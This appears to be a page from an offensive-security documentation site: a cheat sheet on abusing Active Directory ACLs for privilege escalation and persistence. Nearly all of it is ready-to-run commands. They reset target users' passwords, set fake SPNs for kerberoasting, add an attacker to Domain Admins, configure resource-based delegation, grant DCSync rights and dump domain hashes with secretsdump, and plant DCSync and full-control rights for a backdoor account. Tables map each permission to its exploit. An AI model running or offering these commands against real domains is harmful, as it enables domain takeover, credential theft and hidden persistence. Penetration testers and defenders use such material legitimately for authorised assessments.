Persistence
ACL Abuse
Active Directory ACL abuse: GenericAll, WriteDacl, ForceChangePassword, and DACL persistence.
Documentation Index
Fetch the complete documentation index at: /llms.txt
Use this file to discover all available pages before exploring further.
Active Directory ACL abuse: GenericAll, WriteDacl, ForceChangePassword, and DACL persistence.
| ACE | Allows |
|---|---|
| GenericAll | Full control over object |
| GenericWrite | Write any property |
| WriteDacl | Modify DACL (grant yourself permissions) |
| WriteOwner | Change object owner |
| ForceChangePassword | Reset user password |
| AddMember | Add member to group |
| AllExtendedRights | Change password, read LAPS, etc. |
Find-InterestingDomainAcl -ResolveGUIDs
Get-ObjectAcl -SamAccountName USER -ResolveGUIDs
Get-ObjectAcl -SamAccountName "Domain Admins" -ResolveGUIDs | ? {$_.ActiveDirectoryRights -match "GenericAll|WriteDacl|WriteOwner"}
Set-DomainUserPassword -Identity targetuser -AccountPassword (ConvertTo-SecureString 'NewPass123!' -AsPlainText -Force)
net rpc password targetuser 'NewPass123!' -U 'DOMAIN/attacker%password' -S DC_IP
Set-DomainObject -Identity targetuser -SET @{serviceprincipalname='fake/spn'}
Add-DomainGroupMember -Identity "Domain Admins" -Members attacker
net group "Domain Admins" attacker /add /domain
# RBCD
Set-ADComputer TARGET$ -PrincipalsAllowedToDelegateToAccount EVIL$
Add-DomainObjectAcl -TargetIdentity "DC=domain,DC=local" -PrincipalIdentity attacker -Rights DCSync
impacket-secretsdump DOMAIN/attacker:password@DC_IP
Set-DomainObjectOwner -Identity "Domain Admins" -OwnerIdentity attacker
Add-DomainObjectAcl -TargetIdentity "Domain Admins" -PrincipalIdentity attacker -Rights All
Add-DomainGroupMember -Identity "Domain Admins" -Members attacker
Set-DomainUserPassword -Identity targetuser -AccountPassword (ConvertTo-SecureString 'NewPass!' -AsPlainText -Force)
rpcclient -U 'attacker%password' DC_IP -c "setuserinfo2 targetuser 23 'NewPass!'"
Add-DomainObjectAcl -TargetIdentity "DC=domain,DC=local" -PrincipalIdentity backdoor_user -Rights DCSync
Add-DomainObjectAcl -TargetIdentity "Domain Admins" -PrincipalIdentity backdoor_user -Rights All
| ACE | Exploit |
|---|---|
| GenericAll (user) | Reset password or targeted kerberoast |
| GenericAll (group) | Add yourself to group |
| WriteDacl | Grant DCSync rights |
| WriteOwner | Take ownership → full control |
| ForceChangePassword | Reset target password |